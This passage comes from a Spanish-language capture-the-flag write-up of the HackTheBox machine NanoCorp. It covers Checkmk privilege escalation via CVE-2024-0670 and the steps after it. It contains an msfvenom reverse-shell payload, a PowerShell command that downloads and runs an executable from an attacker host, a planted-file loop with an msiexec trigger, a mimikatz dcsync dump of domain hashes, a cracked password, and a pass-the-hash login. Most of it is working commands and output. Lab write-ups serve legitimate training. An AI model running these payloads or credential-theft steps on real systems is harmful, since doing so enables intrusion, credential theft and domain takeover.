-a----         11/4/2025   3:20 PM         189079 vmware-vmsvc-SYSTEM.log                                              
-a----         11/4/2025   3:18 PM          16602 vmware-vmtoolsd-Administrator.log                                    
-a----        11/11/2025   1:33 PM          20998 vmware-vmtoolsd-SYSTEM.log                                           
-a----        11/11/2025   1:45 PM           4891 vmware-vmtoolsd-web_svc.log                                          
-a----         11/4/2025   3:20 PM          66145 vmware-vmusr-Administrator.log                                       
-a----        11/11/2025   1:45 PM           5980 vmware-vmusr-web_svc.log                                             
-a----        11/11/2025   1:33 PM          20132 vmware-vmvss-SYSTEM.log                                              
-a----        11/11/2025  10:28 PM             21 whoami.txt                                                           


PS C:\Windows\Temp> cat whoami.txt
nt authority\system
PS C:\Windows\Temp>

Shell

Creamos un payload con msfvenom y ejecutamos metasploit a la escucha.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=tun0 LPORT=5555 -f exe -o file.exe
msfconsole -q 
use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost tun0
set port 5555

Agregamos la ejecucion de nuestro payload.

1
2
3

PS C:\Windows\Temp> cat payload.cmd
powershell.exe -c "Invoke-WebRequest -Uri http://10.10.14.64/file.exe -OutFile file.exe; ./file.exe"
PS C:\Windows\Temp>

Ejecutamos el foreach y el .msi.

1
2

1..15000 | foreach { copy C:\Windows\Temp\payload.cmd C:\Windows\Temp\cmk_all_${_}_1.cmd; Set-ItemProperty -path C:\Windows\Temp\cmk_all_${_}_1.cmd -name IsReadOnly -value $true;}
msiexec.exe /fa C:\Windows\Installer\1e6f2.msi

Logramos obtener una shell meterpreter en metasploit y la flag root.txt.

msf exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.14.64:5555 
[*] Sending stage (188998 bytes) to 10.129.130.165
[*] Meterpreter session 2 opened (10.10.14.64:5555 -> 10.129.130.165:53504) at 2025-11-11 17:34:52 -0600

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > cat C:/Users/Administrator/Desktop/root.txt
4e71f9c73789eb0dfb9b80e77c6947ec
meterpreter >

Dump Hashes

Con la sesion meterpreter cargamos mimikatz y obtuvimos los hashes del DC.

meterpreter > load mimikatz
[!] The "mimikatz" extension has been replaced by "kiwi". Please use this in future.
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x86/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

[!] Loaded x86 Kiwi on an x64 architecture.

Success.
meterpreter > kiwi_cmd "lsadump::dcsync /all /csv"
[DC] 'nanocorp.htb' will be the domain
[DC] 'DC01.nanocorp.htb' will be the DC server
[DC] Exporting domain 'nanocorp.htb'
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
502	krbtgt	40a21f29fd0f5c9374ded20cb0dc9554	514
1000	DC01$	209ce1eeeaa473fa30ea5518170d1470	532480
1103	web_svc	8c8c66765e18bd3d6720dc34ce969b85	66048
500	Administrator	541f4c0063c05d503fd4acb87c046358	66048
3101	monitoring_svc	3f40355b5414ef3fe57f3cb589deeb50	66048

meterpreter >

Unicamente el valor del hash de web_svc fue encontrado.

Hash	Type	Result
541f4c0063c05d503fd4acb87c046358	Unknown	Not found.
8c8c66765e18bd3d6720dc34ce969b85	NTLM	dksehdgh712!@#
3f40355b5414ef3fe57f3cb589deeb50	Unknown	Not found.
209ce1eeeaa473fa30ea5518170d1470	Unknown	Not found.
40a21f29fd0f5c9374ded20cb0dc9554	Unknown	Not found.

Shell as Administrator

winrmexec.py nos permite hacer pass-the-hash para una shell como administrator.

❯ python winrmexec.py -port 5986 -ssl -hashes :541f4c0063c05d503fd4acb87c046358 -no-pass administrator@dc01.nanocorp.htb
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] '-target_ip' not specified, using dc01.nanocorp.htb
[*] '-url' not specified, using https://dc01.nanocorp.htb:5986/wsman
PS C:\Users\Administrator\Documents> whoami
nanocorp\administrator
PS C:\Users\Administrator\Documents> cat ../Desktop/root.txt
4e71f9c73789eb0dfb9b80e77c6947ec
PS C:\Users\Administrator\Documents>

ScheduledTask

Dos scripts retornan al estado inicial la maquina.

PS C:\Users\Administrator\links> dir


    Directory: C:\Users\Administrator\links


Mode                 LastWriteTime         Length Name                                                                  
----                 -------------         ------ ----                                                                  
-a----          4/9/2025   4:27 PM            274 ad_cleanup.ps1                                                        
-a----          4/9/2025   4:27 PM            377 cleaning_up.ps1                                                       
-a----          4/2/2025   6:22 PM            518 Desktop.lnk                                                           
-a----          4/2/2025   6:22 PM            975 Downloads.lnk                                                         
-a----         4/11/2025  10:43 AM           1817 script_01.ps1                                                         


PS C:\Users\Administrator\links> cat ad_cleanup.ps1
# Remove user web_svc from the group IT_Support
net group "IT_Support" web_svc  /del

# reset the password of monitoring_svc user 
Set-ADAccountPassword -Identity "monitoring_svc" -NewPassword (ConvertTo-SecureString "M-0-N-I-T-0-R-I-N-G@!" -AsPlainText -Force) -Reset
PS C:\Users\Administrator\links> cat cleaning_up.ps1
# Clean up cmk_all_*_1.cmd and cmk_data_*_2.cmd in C:\Windows\Temp
$patterns = @("cmk_all_*_1.cmd", "cmk_data_*_2.cmd")

foreach ($pattern in $patterns) {
    Get-ChildItem -Path "C:\Windows\Temp" -Filter $pattern -File | ForEach-Object {
        if ($_.IsReadOnly) {
            $_.IsReadOnly = $false
        }
        Remove-Item -Path $_.FullName -Force
    }
}
PS C:\Users\Administrator\links> cat script_01.ps1
# Clear existing RDP credentials for the specified target
cmdkey /list | ForEach-Object {
    if ($_ -like "*target=TERMSRV/*") {
        cmdkey /del:($_ -replace " ","" -replace "Target:","")
    }
}

# Define RDP connection parameters
$Server = "nanocorp.htb"
$User = "web_svc"
$Password = "dksehdgh712!@#"

# Function to check if the user "web_svc" is active
function Check-UserActive {
    $output = qwinsta /server:$Server
    return $output | Select-String -Pattern "web_svc"
}

# Function to check if user is a member of "Remote Desktop Users" group
function Is-UserInRDPGroup {
    $groupMembers = Get-ADGroupMember -Identity "Remote Desktop Users"
    return $groupMembers | Where-Object { $_.SamAccountName -eq $User }
}

# Store RDP credentials
cmdkey /generic:TERMSRV/$Server /user:$User /pass:$Password

# Add user to Remote Desktop Users group (if not already added)
if (-not (Is-UserInRDPGroup)) {
    Add-ADGroupMember -Identity "Remote Desktop Users" -Members $User
}

# Check if the user is active before proceeding
$userActive = Check-UserActive

if ($userActive) {
    Write-Output "User '$User' is already active on $Server. No action needed."

    # Remove the user from Remote Desktop Users group
    Remove-ADGroupMember -Identity "Remote Desktop Users" -Members $User -Confirm:$false
    Write-Output "User '$User' has been removed from RDP group."
} else {
    Write-Output "User '$User' is not active on $Server. Proceeding with RDP connection."

    # Initiate RDP connection
    Start-Process "mstsc" -ArgumentList "/v:$Server"

    # Wait for RDP to start 
    Start-Sleep -Seconds 40

    # Close the RDP session (this assumes mstsc window has started)
    Stop-Process -Name mstsc -Force
    Write-Output "RDP session closed."

}
PS C:\Users\Administrator\links>

]]>

CVE-2024-0670 on sckull

HackTheBox - NanoCorp

Recon

nmap

Web Site

Directory Brute Forcing

hire.nanocorp.htb

Directory Brute Forcing

User - web_svc

NTLM Hash

Cracking the Hash

Bloodhound

Users

Web_svc

Monitoring_svc

User - Monitoring_svc

Shell

User - web_svc

Checkmk

Privesc via CVE-2024-0670

Test whoami

Shell

Dump Hashes

Shell as Administrator

ScheduledTask